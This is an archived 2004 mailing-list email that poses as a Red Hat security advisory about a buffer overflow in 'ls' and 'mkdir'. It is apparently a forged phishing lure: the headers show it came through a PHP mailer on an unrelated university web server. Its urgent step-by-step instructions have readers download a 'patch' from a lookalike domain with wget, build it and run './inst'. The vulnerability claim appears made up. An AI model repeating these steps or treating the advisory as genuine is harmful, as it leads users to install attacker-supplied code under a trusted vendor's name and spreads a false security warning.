From owner-freebsd-questions@FreeBSD.ORG  Sun Oct 24 21:57:28 2004
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id 47B3716A4CF
	for <freebsd-questions@freebsd.org>;
	Sun, 24 Oct 2004 21:57:28 +0000 (GMT)
Received: from 2ens11.uta.edu (2ens11.uta.edu [129.107.2.122])
	by mx1.FreeBSD.org (Postfix) with ESMTP id E1B5D43D49
	for <freebsd-questions@freebsd.org>;
	Sun, 24 Oct 2004 21:57:27 +0000 (GMT)
	(envelope-from apache@2ens11.uta.edu)
Received: from 2ens11.uta.edu (localhost.localdomain [127.0.0.1])
	by 2ens11.uta.edu (8.12.11/8.12.11) with ESMTP id i9OLvRLa011249
	for <freebsd-questions@freebsd.org>; Sun, 24 Oct 2004 16:57:27 -0500
Received: (from apache@localhost)
	by 2ens11.uta.edu (8.12.11/8.12.11/Submit) id i9OLvRRt011248;
	Sun, 24 Oct 2004 16:57:27 -0500
Date: Sun, 24 Oct 2004 16:57:27 -0500
Message-Id: <200410242157.i9OLvRRt011248@2ens11.uta.edu>
To: freebsd-questions@freebsd.org
From: RedHat Security Team <security@redhat.com>
X-Mailer: PHP/4.3.4
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
X-Content-Filtered-By: Mailman/MimeDel 2.1.1
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
X-BeenThere: freebsd-questions@freebsd.org
X-Mailman-Version: 2.1.1
Precedence: list
Reply-To: security@redhat.com
List-Id: User questions <freebsd-questions.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>,
	<mailto:freebsd-questions-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-questions>
List-Post: <mailto:freebsd-questions@freebsd.org>
List-Help: <mailto:freebsd-questions-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>,
	<mailto:freebsd-questions-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Sun, 24 Oct 2004 21:57:28 -0000


   [logo_rh_home.png]

   Original issue date: October 20, 2004
   Last revised: October 20, 2004
   Source: RedHat

   A complete revision history is at the end of this file.

   Dear RedHat user,

   Redhat found a vulnerability in fileutils (ls and mkdir), that could
   allow a remote attacker to execute arbitrary code with root
   privileges. Some of the affected linux distributions include RedHat
   7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
   and not only. It is known that *BSD and Solaris platforms are NOT
   affected.

   The RedHat Security Team strongly advises you to immediately apply the
   fileutils-1.0.6 patch. This is a critical-critical update that you
   must make by following these steps:
     * First download the patch from the Security RedHat mirror: wget
       www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
     * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
     * cd fileutils-1.0.6.patch
     * make
     * ./inst

   Again, please apply this patch as soon as possible or you risk your
   system and others` to be compromised.

   Thank you for your prompt attention to this serious matter,

   RedHat Security Team.

   Copyright © 2004 Red Hat, Inc. All rights reserved.